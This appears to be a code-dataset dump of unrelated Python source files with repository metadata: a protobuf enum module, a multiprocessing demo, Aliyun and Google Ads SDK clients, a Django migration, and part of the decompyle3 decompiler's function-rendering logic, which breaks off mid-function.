name='CANNOT_SET_FIELD_WITH_FINAL_URLS', index=18, number=18,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FINAL_URLS_NOT_SET', index=19, number=19,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_PHONE_NUMBER', index=20, number=20,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PHONE_NUMBER_NOT_SUPPORTED_FOR_COUNTRY', index=21, number=21,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CARRIER_SPECIFIC_SHORT_NUMBER_NOT_ALLOWED', index=22, number=22,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PREMIUM_RATE_NUMBER_NOT_ALLOWED', index=23, number=23,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DISALLOWED_NUMBER_TYPE', index=24, number=24,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_DOMESTIC_PHONE_NUMBER_FORMAT', index=25, number=25,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VANITY_PHONE_NUMBER_NOT_ALLOWED', index=26, number=26,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_COUNTRY_CODE', index=27, number=27,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_CALL_CONVERSION_TYPE_ID', index=28, number=28,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_NOT_WHITELISTED_FOR_CALLTRACKING', index=29, number=29,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CALLTRACKING_NOT_SUPPORTED_FOR_COUNTRY', index=30, number=30,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_APP_ID', index=31, number=31,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='QUOTES_IN_REVIEW_EXTENSION_SNIPPET', index=32, number=32,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HYPHENS_IN_REVIEW_EXTENSION_SNIPPET', index=33, number=33,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='REVIEW_EXTENSION_SOURCE_NOT_ELIGIBLE', index=34, number=34,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SOURCE_NAME_IN_REVIEW_EXTENSION_TEXT', index=35, number=35,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MISSING_FIELD', index=36, number=36,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INCONSISTENT_CURRENCY_CODES', index=37, number=37,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_EXTENSION_HAS_DUPLICATED_HEADERS', index=38, number=38,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_ITEM_HAS_DUPLICATED_HEADER_AND_DESCRIPTION', index=39, number=39,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_EXTENSION_HAS_TOO_FEW_ITEMS', index=40, number=40,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_EXTENSION_HAS_TOO_MANY_ITEMS', index=41, number=41,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNSUPPORTED_VALUE', index=42, number=42,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_DEVICE_PREFERENCE', index=43, number=43,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_SCHEDULE_END', index=44, number=45,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE', index=45, number=47,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OVERLAPPING_SCHEDULES_NOT_ALLOWED', index=46, number=48,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SCHEDULE_END_NOT_AFTER_START', index=47, number=49,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TOO_MANY_SCHEDULES_PER_DAY', index=48, number=50,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DUPLICATE_EXTENSION_FEED_ITEM_EDIT', index=49, number=51,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_SNIPPETS_HEADER', index=50, number=52,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PHONE_NUMBER_NOT_SUPPORTED_WITH_CALLTRACKING_FOR_COUNTRY', index=51, number=53,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CAMPAIGN_TARGETING_MISMATCH', index=52, number=54,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_OPERATE_ON_REMOVED_FEED', index=53, number=55,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXTENSION_TYPE_REQUIRED', index=54, number=56,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INCOMPATIBLE_UNDERLYING_MATCHING_FUNCTION', index=55, number=57,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='START_DATE_AFTER_END_DATE', index=56, number=58,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_PRICE_FORMAT', index=57, number=59,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROMOTION_INVALID_TIME', index=58, number=60,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROMOTION_CANNOT_SET_PERCENT_DISCOUNT_AND_MONEY_DISCOUNT', index=59, number=61,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROMOTION_CANNOT_SET_PROMOTION_CODE_AND_ORDERS_OVER_AMOUNT', index=60, number=62,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TOO_MANY_DECIMAL_PLACES_SPECIFIED', index=61, number=63,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_LANGUAGE_CODE', index=62, number=64,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNSUPPORTED_LANGUAGE', index=63, number=65,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_CONSENT_FOR_CALL_RECORDING_REQUIRED', index=64, number=66,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXTENSION_SETTING_UPDATE_IS_A_NOOP', index=65, number=67,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=163,
serialized_end=2717,
)
_sym_db.RegisterEnumDescriptor(_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR)
_EXTENSIONSETTINGERRORENUM = _descriptor.Descriptor(
name='ExtensionSettingErrorEnum',
full_name='google.ads.googleads.v4.errors.ExtensionSettingErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=133,
serialized_end=2717,
)
_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR.containing_type = _EXTENSIONSETTINGERRORENUM
DESCRIPTOR.message_types_by_name['ExtensionSettingErrorEnum'] = _EXTENSIONSETTINGERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ExtensionSettingErrorEnum = _reflection.GeneratedProtocolMessageType('ExtensionSettingErrorEnum', (_message.Message,), dict(
DESCRIPTOR = _EXTENSIONSETTINGERRORENUM,
__module__ = 'google.ads.googleads_v4.proto.errors.extension_setting_error_pb2'
,
__doc__ = """Container for enum describing validation errors of extension settings.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v4.errors.ExtensionSettingErrorEnum)
))
_sym_db.RegisterMessage(ExtensionSettingErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
]
| |
a6f5582fc0f55ce1b8816e501641d8eb3f2f9ea4 | 946c04aa741b557daf56eac46385a613ac5e0cf2 | /PP4E/System/Processes/multi1.py | 2a10bd15027c964d91e4c4a8242d98ae4a2739d0 | []
| no_license | Ozavr/lutz | 513ba0ca91d7188b2d28f649efe454603121106f | 0ee96b5859c81ab04e8d2a3523a17fff089f12f2 | refs/heads/master | 2021-01-02T23:18:16.680021 | 2018-09-04T22:27:35 | 2018-09-04T22:27:35 | 99,497,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | """
основы применения пакета multiprocessing: класс Process по своему действию
напоминает класс threading.Thread, но выполняет функцию в отдельном процессе,
а не в потоке; для синхронизации можно использовать блокировки, например, для
вывода текста; запускает новый процесс интерпретатора в Windows, порождает
дочерний процесс в Unix;
"""
import os
from multiprocessing import Process, Lock
def whoami(label, lock):
msg = '%s: name:%s, pid:%s'
with lock:
print(msg % (label, __name__, os.getppid()))
if __name__ == '__main__':
lock = Lock()
whoami('function call', lock)
p = Process(target=whoami, args=('spawned child', lock))
p.start()
p .join()
for i in range(5):
Process(target=whoami, args=(('run process %s' % i), lock)).start()
with lock:
print('Main process exit.') | [
"[email protected]"
]
| |
f90a330761a43f328e206363dca801aabefd20f4 | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-dysmsapi/aliyunsdkdysmsapi/request/v20170525/AddSmsSignRequest.py | c3e037abfab8fb2d6f9075b66dd5a949c573ec10 | [
"Apache-2.0"
]
| permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 2,870 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdysmsapi.endpoint import endpoint_data
class AddSmsSignRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Dysmsapi', '2017-05-25', 'AddSmsSign')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Remark(self):
return self.get_query_params().get('Remark')
def set_Remark(self,Remark):
self.add_query_param('Remark',Remark)
def get_SignName(self):
return self.get_query_params().get('SignName')
def set_SignName(self,SignName):
self.add_query_param('SignName',SignName)
def get_SignFileLists(self):
return self.get_body_params().get('SignFileList')
def set_SignFileLists(self, SignFileLists):
for depth1 in range(len(SignFileLists)):
if SignFileLists[depth1].get('FileContents') is not None:
self.add_body_params('SignFileList.' + str(depth1 + 1) + '.FileContents', SignFileLists[depth1].get('FileContents'))
if SignFileLists[depth1].get('FileSuffix') is not None:
self.add_body_params('SignFileList.' + str(depth1 + 1) + '.FileSuffix', SignFileLists[depth1].get('FileSuffix'))
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_SignSource(self):
return self.get_query_params().get('SignSource')
def set_SignSource(self,SignSource):
self.add_query_param('SignSource',SignSource) | [
"[email protected]"
]
| |
ad8838d4134389b893ad78037c7bacb4573923a7 | 450c45e780332f56ea339a83891f0c12d6120794 | /google/ads/google_ads/v2/services/age_range_view_service_client.py | e1aee0f95f28e5e679c2b9a8b0e6278f3c17cfec | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
]
| permissive | akaashhazarika/google-ads-python | 7766370cc526190c962dc9ff806520d459b05c25 | 25b43aa616020ad7dfa55b90fa236a29cf97d45a | refs/heads/master | 2020-06-07T08:56:21.533323 | 2019-06-27T15:26:49 | 2019-06-27T15:26:49 | 191,448,135 | 0 | 0 | Apache-2.0 | 2019-06-11T20:57:04 | 2019-06-11T20:57:04 | null | UTF-8 | Python | false | false | 9,812 | py | # -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.ads.googleads.v2.services AgeRangeViewService API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.path_template
from google.ads.google_ads.v2.services import age_range_view_service_client_config
from google.ads.google_ads.v2.services.transports import age_range_view_service_grpc_transport
from google.ads.google_ads.v2.proto.services import age_range_view_service_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
'google-ads',
).version
class AgeRangeViewServiceClient(object):
"""Service to manage age range views."""
SERVICE_ADDRESS = 'googleads.googleapis.com:443'
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = 'google.ads.googleads.v2.services.AgeRangeViewService'
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AgeRangeViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def age_range_view_path(cls, customer, age_range_view):
"""Return a fully-qualified age_range_view string."""
return google.api_core.path_template.expand(
'customers/{customer}/ageRangeViews/{age_range_view}',
customer=customer,
age_range_view=age_range_view,
)
def __init__(self, transport=None, channel=None, credentials=None,
client_config=None, client_info=None):
"""Constructor.
Args:
transport (Union[~.AgeRangeViewServiceGrpcTransport,
Callable[[~.Credentials, type], ~.AgeRangeViewServiceGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn('The `client_config` argument is deprecated.',
PendingDeprecationWarning, stacklevel=2)
else:
client_config = age_range_view_service_client_config.config
if channel:
warnings.warn('The `channel` argument is deprecated; use '
'`transport` instead.',
PendingDeprecationWarning, stacklevel=2)
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=age_range_view_service_grpc_transport.AgeRangeViewServiceGrpcTransport,
)
else:
if credentials:
raise ValueError(
'Received both a transport instance and '
'credentials; these are mutually exclusive.'
)
self.transport = transport
else:
self.transport = age_range_view_service_grpc_transport.AgeRangeViewServiceGrpcTransport(
address=self.SERVICE_ADDRESS,
channel=channel,
credentials=credentials,
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION,
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config['interfaces'][self._INTERFACE_NAME],
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def get_age_range_view(
self,
resource_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Returns the requested age range view in full detail.
Args:
resource_name (str): The resource name of the age range view to fetch.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.ads.googleads_v2.types.AgeRangeView` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if 'get_age_range_view' not in self._inner_api_calls:
self._inner_api_calls['get_age_range_view'] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_age_range_view,
default_retry=self._method_configs['GetAgeRangeView'].retry,
default_timeout=self._method_configs['GetAgeRangeView'].timeout,
client_info=self._client_info,
)
request = age_range_view_service_pb2.GetAgeRangeViewRequest(
resource_name=resource_name,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [('resource_name', resource_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(routing_header)
metadata.append(routing_metadata)
return self._inner_api_calls['get_age_range_view'](request, retry=retry, timeout=timeout, metadata=metadata)
| [
"[email protected]"
]
| |
eaa3af01316e70493317fc5e190e308304501276 | 5949db57f8de8278359f45fe64395f44017671bc | /blog/migrations/0002_auto_20180122_0552.py | fdc4f73978db4766bafa256495e6be4132467df4 | []
| no_license | andrewidya/personal_blog | 71ed6b83ac3c594fa40b9fb40145af3e37dd3079 | c64df84f65dafd03ac05cf222fc113416e6926d5 | refs/heads/master | 2020-04-08T16:39:30.559072 | 2018-11-28T16:20:48 | 2018-11-28T16:20:48 | 159,528,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-22 05:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='RelatedPage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.RemoveField(
model_name='blogpage',
name='related_pages',
),
migrations.AddField(
model_name='relatedpage',
name='page_from',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_page_from', to='blog.BlogPage', verbose_name='Page From'),
),
migrations.AddField(
model_name='relatedpage',
name='page_to',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_page_to', to='blog.BlogPage', verbose_name='Page To'),
),
]
| [
"[email protected]"
]
| |
f419cc7d65322b77ae227506168498401d3d7c01 | a38180435ac5786185c0aa48891c0aed0ab9d72b | /S4/S4 Decompiler/decompyle3/semantics/make_function36.py | 602936bbf3b0f37273e472b635dbfb0fc03dfe5d | [
"CC-BY-4.0"
]
| permissive | NeonOcean/Environment | e190b6b09dd5dbecba0a38c497c01f84c6f9dc7d | ca658cf66e8fd6866c22a4a0136d415705b36d26 | refs/heads/master | 2022-12-03T13:17:00.100440 | 2021-01-09T23:26:55 | 2021-01-09T23:26:55 | 178,096,522 | 1 | 1 | CC-BY-4.0 | 2022-11-22T20:24:59 | 2019-03-28T00:38:17 | Python | UTF-8 | Python | false | false | 12,326 | py | # Copyright (c) 2019-2020 by Rocky Bernstein
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
All the crazy things we have to do to handle Python functions.
"""
from xdis import (
iscode,
CO_GENERATOR,
CO_ASYNC_GENERATOR,
code_has_star_arg,
code_has_star_star_arg,
)
from decompyle3.scanner import Code
from decompyle3.semantics.parser_error import ParserError
from decompyle3.parsers.main import ParserError as ParserError2
from decompyle3.semantics.helper import (
find_all_globals,
find_globals_and_nonlocals,
find_none,
)
from decompyle3.show import maybe_show_tree_param_default
def make_function36(self, node, is_lambda, nested=1, code_node=None):
"""Dump function definition, doc string, and function body in
Python version 3.6 and above.
"""
# MAKE_CLOSURE adds an additional closure slot
# In Python 3.6 and above stack change again. I understand
# 3.7 changes some of those changes, although I don't
# see it in this code yet. Yes, it is hard to follow
# and I am sure I haven't been able to keep up.
# Thank you, Python.
def build_param(ast, name, default, annotation=None):
"""build parameters:
- handle defaults
- handle format tuple parameters
"""
value = default
maybe_show_tree_param_default(self.showast, name, value)
if annotation:
result = "%s: %s=%s" % (name, annotation, value)
else:
result = "%s=%s" % (name, value)
# The below can probably be removed. This is probably
# a holdover from days when LOAD_CONST erroneously
# didn't handle LOAD_CONST None properly
if result[-2:] == "= ": # default was 'LOAD_CONST None'
result += "None"
return result
# MAKE_FUNCTION_... or MAKE_CLOSURE_...
assert node[-1].kind.startswith("MAKE_")
# Python 3.3+ adds a qualified name at TOS (-1)
# moving down the LOAD_LAMBDA instruction
lambda_index = -3
args_node = node[-1]
annotate_dict = {}
# Get a list of tree nodes that constitute the values for the "default
# parameters"; these are default values that appear before any *, and are
# not to be confused with keyword parameters which may appear after *.
args_attr = args_node.attr
if len(args_attr) == 3:
pos_args, kw_args, annotate_argc = args_attr
else:
pos_args, kw_args, annotate_argc, closure = args_attr
i = -4 if node[-2] != "docstring" else -5
kw_pairs = 0
if annotate_argc:
# Turn into subroutine and DRY with other use
annotate_node = node[i]
if annotate_node == "expr":
annotate_node = annotate_node[0]
annotate_name_node = annotate_node[-1]
if annotate_node == "dict" and annotate_name_node.kind.startswith(
"BUILD_CONST_KEY_MAP"
):
types = [self.traverse(n, indent="") for n in annotate_node[:-2]]
names = annotate_node[-2].attr
l = len(types)
assert l == len(names)
for i in range(l):
annotate_dict[names[i]] = types[i]
pass
pass
i -= 1
if closure:
# FIXME: fill in
# annotate = node[i]
i -= 1
if kw_args:
kw_node = node[pos_args]
if kw_node == "expr":
kw_node = kw_node[0]
if kw_node == "dict":
kw_pairs = kw_node[-1].attr
defparams = []
# FIXME: DRY with code below
default, kw_args, annotate_argc = args_node.attr[0:3]
if default:
expr_node = node[0]
if node[0] == "pos_arg":
expr_node = expr_node[0]
assert expr_node == "expr", "expecting mkfunc default node to be an expr"
if expr_node[0] == "LOAD_CONST" and isinstance(expr_node[0].attr, tuple):
defparams = [repr(a) for a in expr_node[0].attr]
elif expr_node[0] in frozenset(("list", "tuple", "dict", "set")):
defparams = [self.traverse(n, indent="") for n in expr_node[0][:-1]]
else:
defparams = []
pass
if lambda_index and is_lambda and iscode(node[lambda_index].attr):
assert node[lambda_index].kind == "LOAD_LAMBDA"
code = node[lambda_index].attr
else:
code = code_node.attr
assert iscode(code)
scanner_code = Code(code, self.scanner, self.currentclass)
# add defaults values to parameter names
argc = code.co_argcount
kwonlyargcount = code.co_kwonlyargcount
paramnames = list(scanner_code.co_varnames[:argc])
kwargs = list(scanner_code.co_varnames[argc : argc + kwonlyargcount])
paramnames.reverse()
defparams.reverse()
try:
ast = self.build_ast(
scanner_code._tokens,
scanner_code._customize,
is_lambda=is_lambda,
noneInNames=("None" in code.co_names),
)
except (ParserError, ParserError2) as p:
self.write(str(p))
if not self.tolerate_errors:
self.ERROR = p
return
i = len(paramnames) - len(defparams)
# build parameters
params = []
if defparams:
for i, defparam in enumerate(defparams):
params.append(
build_param(
ast, paramnames[i], defparam, annotate_dict.get(paramnames[i])
)
)
for param in paramnames[i + 1 :]:
if param in annotate_dict:
params.append("%s: %s" % (param, annotate_dict[param]))
else:
params.append(param)
else:
for param in paramnames:
if param in annotate_dict:
params.append("%s: %s" % (param, annotate_dict[param]))
else:
params.append(param)
params.reverse() # back to correct order
if code_has_star_arg(code):
star_arg = code.co_varnames[argc + kwonlyargcount]
if star_arg in annotate_dict:
params.append("*%s: %s" % (star_arg, annotate_dict[star_arg]))
else:
params.append("*%s" % star_arg)
argc += 1
# dump parameter list (with default values)
if is_lambda:
self.write("lambda")
if len(params):
self.write(" ", ", ".join(params))
elif kwonlyargcount > 0 and not (4 & code.co_flags):
assert argc == 0
self.write(" ")
# If the last statement is None (which is the
# same thing as "return None" in a lambda) and the
# next to last statement is a "yield". Then we want to
# drop the (return) None since that was just put there
# to have something to after the yield finishes.
# FIXME: this is a bit hoaky and not general
if (
len(ast) > 1
and self.traverse(ast[-1]) == "None"
and self.traverse(ast[-2]).strip().startswith("yield")
):
del ast[-1]
# Now pick out the expr part of the last statement
ast_expr = ast[-1]
while ast_expr.kind != "expr":
ast_expr = ast_expr[0]
ast[-1] = ast_expr
pass
else:
self.write("(", ", ".join(params))
# self.println(indent, '#flags:\t', int(code.co_flags))
ends_in_comma = False
if kwonlyargcount > 0:
if not (4 & code.co_flags):
if argc > 0:
self.write(", *, ")
else:
self.write("*, ")
pass
ends_in_comma = True
else:
if argc > 0:
self.write(", ")
ends_in_comma = True
ann_dict = kw_dict = default_tup = None
fn_bits = node[-1].attr
# Skip over:
# MAKE_FUNCTION,
# optional docstring
# LOAD_CONST qualified name,
# LOAD_CONST code object
index = -5 if node[-2] == "docstring" else -4
if fn_bits[-1]:
index -= 1
if fn_bits[-2]:
ann_dict = node[index]
index -= 1
if fn_bits[-3]:
kw_dict = node[index]
index -= 1
if fn_bits[-4]:
default_tup = node[index]
if kw_dict == "expr":
kw_dict = kw_dict[0]
kw_args = [None] * kwonlyargcount
# FIXME: handle free_tup, ann_dict, and default_tup
if kw_dict:
assert kw_dict == "dict"
defaults = [self.traverse(n, indent="") for n in kw_dict[:-2]]
names = eval(self.traverse(kw_dict[-2]))
assert len(defaults) == len(names)
sep = ""
# FIXME: possibly handle line breaks
for i, n in enumerate(names):
idx = kwargs.index(n)
if annotate_dict and n in annotate_dict:
t = "%s: %s=%s" % (n, annotate_dict[n], defaults[i])
else:
t = "%s=%s" % (n, defaults[i])
kw_args[idx] = t
pass
pass
# handle others
other_kw = [c == None for c in kw_args]
for i, flag in enumerate(other_kw):
if flag:
n = kwargs[i]
if n in annotate_dict:
kw_args[i] = "%s: %s" % (n, annotate_dict[n])
else:
kw_args[i] = "%s" % n
self.write(", ".join(kw_args))
ends_in_comma = False
pass
else:
if argc == 0:
ends_in_comma = True
if code_has_star_star_arg(code):
if not ends_in_comma:
self.write(", ")
star_star_arg = code.co_varnames[argc + kwonlyargcount]
if annotate_dict and star_star_arg in annotate_dict:
self.write("**%s: %s" % (star_star_arg, annotate_dict[star_star_arg]))
else:
self.write("**%s" % star_star_arg)
if is_lambda:
self.write(": ")
else:
self.write(")")
if annotate_dict and "return" in annotate_dict:
self.write(" -> %s" % annotate_dict["return"])
self.println(":")
if node[-2] == "docstring" and not is_lambda:
# docstring exists, dump it
self.println(self.traverse(node[-2]))
assert ast in ("stmts", "lambda_start")
all_globals = find_all_globals(ast, set())
globals, nonlocals = find_globals_and_nonlocals(
ast, set(), set(), code, self.version
)
for g in sorted((all_globals & self.mod_globs) | globals):
self.println(self.indent, "global ", g)
for nl in sorted(nonlocals):
self.println(self.indent, "nonlocal ", nl)
self.mod_globs -= all_globals
has_none = "None" in code.co_names
rn = has_none and not find_none(ast)
self.gen_source(
ast, code.co_name, scanner_code._customize, is_lambda=is_lambda, returnNone=rn
)
# In obscure cases, a function may be a generator but the "yield"
# was optimized away. Here, we need to put in unreachable code to
# add in "yield" just so that the compiler will mark
# the GENERATOR bit of the function. See for example
# Python 3.x's test_connection.py and test_contexlib_async test programs.
if not is_lambda and code.co_flags & (CO_GENERATOR | CO_ASYNC_GENERATOR):
need_bogus_yield = True
for token in scanner_code._tokens:
if token == "YIELD_VALUE":
need_bogus_yield = False
break
pass
if need_bogus_yield:
